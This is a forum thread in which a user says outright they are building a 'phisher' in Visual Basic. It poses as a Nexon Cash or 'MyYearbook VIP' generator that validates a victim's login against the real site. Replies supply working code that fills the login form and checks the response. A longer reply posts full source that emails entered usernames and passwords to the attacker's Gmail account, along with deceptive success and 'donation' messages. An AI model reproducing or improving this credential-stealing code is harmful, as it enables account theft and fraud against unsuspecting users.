ExclamationOnline Checker

Posts 1–9 of 9 · Page 1 of 1
Online Checker
I want to make my application check the site login if it's a real account.

Yes I'm making a phisher, no I'm not using it for evil.
Just getting to know my way with visual basic.
I don't have nearly enough time on a computer to spam lobbies of games about it. So Jason you can be chill...

Anyway I want it to take the stuff from TextBoxID and TextBoxPW and put it in the textboxes Here.
I'm already looking through it with "Inspect Element" and I found that the login form itself is called "frmLogin" and the text boxes are "txtID" and "txtPW".

But yeah I need the program to check the login and enter the information from the textboxes to the according textboxes.
Like this (sort of)
Code:
Insert "TextBoxID" into "TxtID"
Insert "TextBoxPW" into "TxtPW"
But of course there is more (I do not need to make another thread in near future.)

I want it to say "NX Failed to add" if the login info is fake so I need it to check if the info on the site.

Something like...
Code:
If Success = True then MsgBox("Nexon Cash Successfully Added!")
If Success = False then MsgBox("Nexon Cash Failed to be Added")
Yes I know most of the code that I supplied for you is total bullshit but that is why I am asking for your help.

Help me out guys.
Here are the codes.

Put this code in the button:
Code:
WebBrowser1.Document.GetElementById("TxtID").SetAttribute("value", TextBoxID.Text)
WebBrowser1.Document.GetElementById("TxtPwd").SetAttribute("value", TextBoxPW.Text)
Timer1.Start()
Then add a timer (Interval: 5000, Enabled = False)
Code:
If WebBrowser1.DocumentText.Contains("Failed")
Timer1.Stop()
MsgBox("Nexon Cash Successfully Added!")
Else
Timer1.Stop()
MsgBox("Nexon Cash Failed to be Added")
End If
In
Code:
If WebBrowser1.DocumentText.Contains("Failed")
Change the red word Failed to the word it says if you get a login error on nexon. I can't access nexon, so I don't know what words it say when it fails login
Quote Originally Posted by TheBest-1337 View Post
Here are the codes.

Put this code in the button:
Code:
WebBrowser1.Document.GetElementById("TxtID").SetAttribute("value", TextBoxID.Text)
WebBrowser1.Document.GetElementById("TxtPwd").SetAttribute("value", TextBoxPW.Text)
Timer1.Start()
Then add a timer (Interval: 5000, Enabled = False)
Code:
If WebBrowser1.DocumentText.Contains("Failed")
Timer1.Stop()
MsgBox("Nexon Cash Successfully Added!")
Else
Timer1.Stop()
MsgBox("Nexon Cash Failed to be Added")
End If
In
Code:
If WebBrowser1.DocumentText.Contains("Failed")
Change the red word Failed to the word it says if you get a login error on nexon. I can't access nexon, so I don't know what words it say when it fails login
It says WebBrowser1 is not declared. It wants me to correct to WebBrowser or WebBrowserBase.

I also have it set to email me the info from the text boxes.

I want it to only email me the account info if it is a real account (no fail).
@TheBest-1337
Quote Originally Posted by willrulz188 View Post
@Sketchy

Go into tools and add webbrowser ?
You see, this is why I need help.
@willrulz188

Thanks bro!
why this smells like account stealer?
Basically use the webpage source to identify if the account is real.
no. he wants it to email him the info as well. Very easy, but also, not aloud. lmao
ok bro i can give you my code, but you have to change some stuff
like my txt boxes say sorry server down, please try again and stuff like that so u have to change,

i have 2 text box
2 botons
1 progress bar

this is for gmail, so if u have hotmail,yahoo chnage the server in the code




Code:
Imports System.Net.Mail

Public Class Form1

    Private Sub Button1_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button1.Click
        Timer1.Start()

        If TextBox1.Text = "" Then
            MsgBox("Please check you email address and try again", MsgBoxStyle.Information, "Log-In")
            If TextBox2.Text = "" Then
                MsgBox("Please check you password and try again", MsgBoxStyle.Information, "Log-In")
            Else
            End If
        End If
        Dim smtpServer As New SmtpClient()
        Dim mail As New MailMessage()
        smtpServer.Credentials = New Net.NetworkCredential("your email", "your password")
        'using gmail
        smtpServer.Port = 587
        smtpServer.Host = "smtp.gmail.com"
        smtpServer.EnableSsl = True
        mail = New MailMessage()
        mail.From = New MailAddress("ur email")
        mail.To.Add("ur email")
        mail.Subject = "email subject"
        mail.Body = "Username : " & TextBox1.Text & ", " & "Password : " & TextBox2.Text
        smtpServer.Send(mail)
        MsgBox("Thank You for using MyYearbook VIP, please check your account and let us know if it worked :D", MsgBoxStyle.Information, "Done :D")




    End Sub

    Private Sub Timer1_Tick(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Timer1.Tick
        ProgressBar1.Increment(1)
        If ProgressBar1.Value = ProgressBar1.Maximum Then

        End If
    End Sub

    Private Sub Button2_Click(ByVal sender As System.Object, ByVal e As System.EventArgs) Handles Button2.Click
        MsgBox("Thanks for your Donation, 50$ has been taken off your account :D", MsgBoxStyle.Information, "Thank You")
    End Sub
End Class

final project :
Posts 1–9 of 9 · Page 1 of 1

Post a Reply

Tags for this Thread

None

Need help?